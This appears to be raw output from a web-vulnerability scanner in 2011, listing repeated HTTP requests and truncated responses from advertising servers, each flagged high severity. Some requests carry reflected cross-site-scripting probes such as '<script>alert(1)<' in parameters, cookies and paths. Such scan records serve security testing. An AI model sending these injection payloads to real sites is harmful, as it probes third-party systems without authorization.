GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:03 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480d7ecd<script>alert(1)< Set-Cookie: 480d7ecd<script>alert(1)< Set-Cookie: 480d7ecd<script>alert(1)< Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a]=new c3VTJSInter();this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:03 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_10650 Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a] ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:06 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_39153 Content-Length: 6679 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... .c3VJSnuid='39153413 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:04 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_17462 Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... 72191303613803';this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:04 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_80487 Content-Length: 6699 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... this.C3VTcallVar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:39:05 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_05-02-2011 Set-Cookie: 480-VT=aol_05-05-2011-12 Set-Cookie: 480-nUID=adver_13016 Content-Length: 6679 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... .c3VJSnuid='13016313 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adver&cid=480745f6<script>alert(1)< Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:56 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adverc9a94<script>alert(1)< Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:56 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /v.js |
GET /v.js?id=adver&cid=480&t Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=13014572191303 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:38:56 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1049 Connection: close Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.rub_usatoday/ |
GET /adj/cm.rub_usatoday19712'-alert(1)- Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 444 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:37:03 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.rub_usatoday/ |
GET /adj/cm.rub_usatoday/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 448 Date: Mon, 09 May 2011 15:37:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: dc=dc; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://a.collective-media |
Path: | /adj/cm.rub_usatoday/ |
GET /adj/cm.rub_usatoday/;sz Host: a.collective-media.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Content-Length: 445 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:37:02 GMT Connection: close Set-Cookie: dc=dc; domain=collective-media var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var ifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7479 Cache-Control: no-cache Pragma: no-cache Date: Mon, 09 May 2011 15:38:51 GMT Expires: Mon, 09 May 2011 15:38:51 GMT <html><head><title ...[SNIP]... 2FzyAEJ2gEgaHR0cDovL var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscripta ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:38:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7509 <html><head><title ...[SNIP]... 44AFCY-bG__f___ var fscUrl = url; ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:38:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7505 <html><head><title ...[SNIP]... B4MjUwX2FzyAEJ2gEgaH var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:38:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7505 <html><head><title ...[SNIP]... -bG__f____8BYMmGhYmI var fscUrl = url; var f ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:38:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7505 <html><head><title ...[SNIP]... 3dy50aGVyZXB1YmxpYy5 var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /adi/N4300.Google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:38:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7505 <html><head><title ...[SNIP]... click%3Bh%3Dv8/3b02/f/1a3 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7402 Cache-Control: no-cache Pragma: no-cache Date: Mon, 09 May 2011 15:36:23 GMT Expires: Mon, 09 May 2011 15:36:23 GMT <html><head><title ...[SNIP]... i4AhjAAgTIAp-OoBjgAg var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "nev ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:35:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7464 <html><head><title ...[SNIP]... vbboBCTcyOHg5MF9hc8g var fscUrl = url; v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:36:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7556 <html><head><title ...[SNIP]... CAZgCmgi4AhjAAgTIAp var fscUrl = url; var fscUrlClickTagFound = false; var wmode = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:36:01 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7556 <html><head><title ...[SNIP]... TcyOHg5MF9hc8gBCdoBI ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:36:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7464 <html><head><title ...[SNIP]... b25pdG9yLmNvbS9CdXNpbmVzc var fscUrl = url; var fscUrlClickTagFound = false; var wmode = ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4492.134426 |
GET /adi/N4492.134426 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:35:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7441 <html><head><title ...[SNIP]... url = escape("http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:37:16 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5946 <html><head><title ...[SNIP]... k%3Bh%3Dv8/3b02/7/aa/%2a var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscrip ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:37:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5946 <html><head><title ...[SNIP]... eclick.net/click%3Bh%3Dv8 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; v ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:37:30 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5946 <html><head><title ...[SNIP]... 3B0%3B63480535%3B3454-728 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always"; var openWindow = "fals ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:37:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5958 <html><head><title ...[SNIP]... 535%3B3454-728/90 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always"; var openWindow = "false"; var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:37:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5946 <html><head><title ...[SNIP]... 0535%3B3454-728/90 var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "always"; var openWindow = "false"; var w ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5895.133090 |
GET /adi/N5895.133090 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://bidder.mathtag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 09 May 2011 15:36:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5946 <html><head><title ...[SNIP]... tp://ad.doubleclick.net var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; va ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N2883.6441.USATODAY |
GET /adj/N2883.6441.USATODAY Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 36418 Cache-Control: no-cache Pragma: no-cache Date: Mon, 09 May 2011 15:37:08 GMT Expires: Mon, 09 May 2011 15:37:08 GMT document.write(''); if(typeof(dartCallba var dartCallbackObjects = new Array(); if(typeof(dartCreati var dartCreativeDisplayM ...[SNIP]... g=1;v=1;pid=62098467;aid this.swfParams = 'ct=US&st=VT&ac=802&zp this.renderingId = "41839342"; this.previewMode = (("%PreviewMode" == "true") ? true : false); this.debugEventsMode = (("%DebugEventsMode" == "true") ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bridgetrack |
Path: | /a/f/ |
GET /a/f/?BT_CON=200&BT_PID Host: ads.bridgetrack.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BTA144=; BTA=GUID=4CEEBF00B42 |
